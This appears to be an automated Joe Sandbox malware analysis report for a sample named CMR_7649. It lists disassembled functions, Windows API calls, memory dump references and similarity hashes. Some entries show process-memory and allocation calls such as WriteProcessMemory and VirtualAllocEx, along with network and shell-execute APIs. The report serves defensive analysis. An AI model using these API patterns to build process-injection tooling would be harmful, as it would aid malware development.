                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                • String ID:
                                                • API String ID: 4023252218-0
                                                • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                • String ID:
                                                • API String ID: 1489400265-0
                                                • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                • DestroyWindow.USER32(?), ref: 00455728
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                • String ID:
                                                • API String ID: 1042038666-0
                                                • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • __getptd.LIBCMT ref: 0041780F
                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                • __getptd.LIBCMT ref: 00417826
                                                • __amsg_exit.LIBCMT ref: 00417834
                                                • __lock.LIBCMT ref: 00417844
                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                • String ID:
                                                • API String ID: 938513278-0
                                                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                • __freefls@4.LIBCMT ref: 00413D74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                • String ID:
                                                • API String ID: 2403457894-0
                                                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                • ExitThread.KERNEL32 ref: 004151ED
                                                • __freefls@4.LIBCMT ref: 00415209
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                • String ID:
                                                • API String ID: 4247068974-0
                                                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                Function 004624C5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 409COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5$8$^
                                                • API String ID: 0-3622883839
                                                • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                                                • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                                                Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: )$U$\
                                                • API String ID: 0-3705770531
                                                • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                • CoUninitialize.OLE32 ref: 0046E53D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                Download Yara Rule
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 708495834-557222456
                                                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \$]$h
                                                • API String ID: 4104443479-3262404753
                                                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • CloseHandle.KERNEL32(?), ref: 00457E09
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                • String ID: <$@
                                                • API String ID: 2417854910-1426351568
                                                • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
